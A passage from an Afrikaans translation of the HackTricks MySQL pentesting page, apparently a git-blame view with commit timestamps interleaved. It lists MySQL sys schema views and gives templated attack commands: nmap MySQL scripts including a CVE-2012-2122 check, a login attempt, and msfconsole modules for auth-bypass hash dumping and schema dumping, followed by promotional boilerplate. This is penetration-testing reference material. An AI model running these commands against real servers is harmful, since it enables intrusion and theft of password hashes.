memory\_by\_host\_by\_current\_bytes\
2024-04-06 18:08:38 +00:00
memory\_by\_thread\_by\_current schema\_table\_statistics\
2022-05-01 13:25:53 +00:00
schema\_table\_statistics\_with\_buffer\
schema\_tables\_with\_full\_table\_scans\
schema\_unused\_indexes\
session\
2022-05-01 13:25:53 +00:00
session\_ssl\_status\
statement\_analysis\
statements\_with\_errors\_or\_warnings\
statements\_with\_full\_table\_scans\
statements\_with\_runtimes\_in\_95th\_percentile\
statements\_with\_sorting\
statements\_with\_temp\_tables\
sys\_config\
user\_summary\
user\_summary\_by\_file\_io\
user\_summary\_by\_file\_io\_type\
user\_summary\_by\_stages\
user\_summary\_by\_statement\_latency\
user\_summary\_by\_statement\_type\
version\
2022-05-01 13:25:53 +00:00
wait\_classes\_global\_by\_avg\_latency\
wait\_classes\_global\_by\_latency\
waits\_by\_host\_by\_latency\
waits\_by\_user\_by\_latency\
waits\_global\_by\_latency\
x$host\_summary\
x$host\_summary\_by\_file\_io\
x$host\_summary\_by\_file\_io\_type\
x$host\_summary\_by\_stages\
x$host\_summary\_by\_statement\_latency\
x$host\_summary\_by\_statement\_type\
x$innodb\_buffer\_stats\_by\_schema\
x$innodb\_buffer\_stats\_by\_table\
x$innodb\_lock\_waits\
x$io\_by\_thread\_by\_latency\
x$io\_global\_by\_file\_by\_bytes\
x$io\_global\_by\_file\_by\_latency\
x$io\_global\_by\_wait\_by\_bytes\
x$io\_global\_by\_wait\_by\_latency\
x$latest\_file\_io\
x$memory\_by\_host\_by\_current\_bytes\
x$memory\_by\_thread\_by\_current\_bytes\
x$memory\_by\_user\_by\_current\_bytes\
x$memory\_global\_by\_current\_bytes\
x$memory\_global\_total\
x$processlist\
2022-05-01 13:25:53 +00:00
x$ps\_digest\_95th\_percentile\_by\_avg\_us\
x$ps\_digest\_avg\_latency\_distribution\
x$ps\_schema\_table\_statistics\_io\
x$schema\_flattened\_keys\
x$schema\_index\_statistics\
x$schema\_table\_lock\_waits\
x$schema\_table\_statistics\
x$schema\_table\_statistics\_with\_buffer\
x$schema\_tables\_with\_full\_table\_scans\
x$session\
2022-05-01 13:25:53 +00:00
x$statement\_analysis\
x$statements\_with\_errors\_or\_warnings\
x$statements\_with\_full\_table\_scans\
x$statements\_with\_runtimes\_in\_95th\_percentile\
x$statements\_with\_sorting\
x$statements\_with\_temp\_tables\
x$user\_summary\
x$user\_summary\_by\_file\_io\
x$user\_summary\_by\_file\_io\_type\
x$user\_summary\_by\_stages\
x$user\_summary\_by\_statement\_latency\
x$user\_summary\_by\_statement\_type\
x$wait\_classes\_global\_by\_avg\_latency\
x$wait\_classes\_global\_by\_latency\
x$waits\_by\_host\_by\_latency\
x$waits\_by\_user\_by\_latency\
x$waits\_global\_by\_latency
2021-08-12 13:10:06 +00:00
2024-02-11 02:07:06 +00:00
## HackTricks Outomatiese Opdragte
2024-04-06 18:08:38 +00:00
```
2021-08-12 13:10:06 +00:00
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
2021-08-15 17:37:03 +00:00
Entry_1:
2024-02-11 02:07:06 +00:00
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
2021-08-15 17:37:03 +00:00
2024-02-11 02:07:06 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-mysql
2021-08-15 17:37:03 +00:00
Entry_2:
2024-02-11 02:07:06 +00:00
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
2021-08-15 17:37:03 +00:00
Entry_3:
2024-02-11 02:07:06 +00:00
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
2022-10-25 15:56:49 +00:00
2024-02-11 02:07:06 +00:00
```
2024-04-06 18:08:38 +00:00
2022-10-25 15:56:49 +00:00
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
2024-02-11 02:07:06 +00:00
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline.
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
2024-02-03 01:15:34 +00:00
2024-02-11 02:07:06 +00:00
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
2024-04-06 18:08:38 +00:00
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2024-02-11 02:07:06 +00:00
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
2022-04-28 16:01:33 +00:00
</details>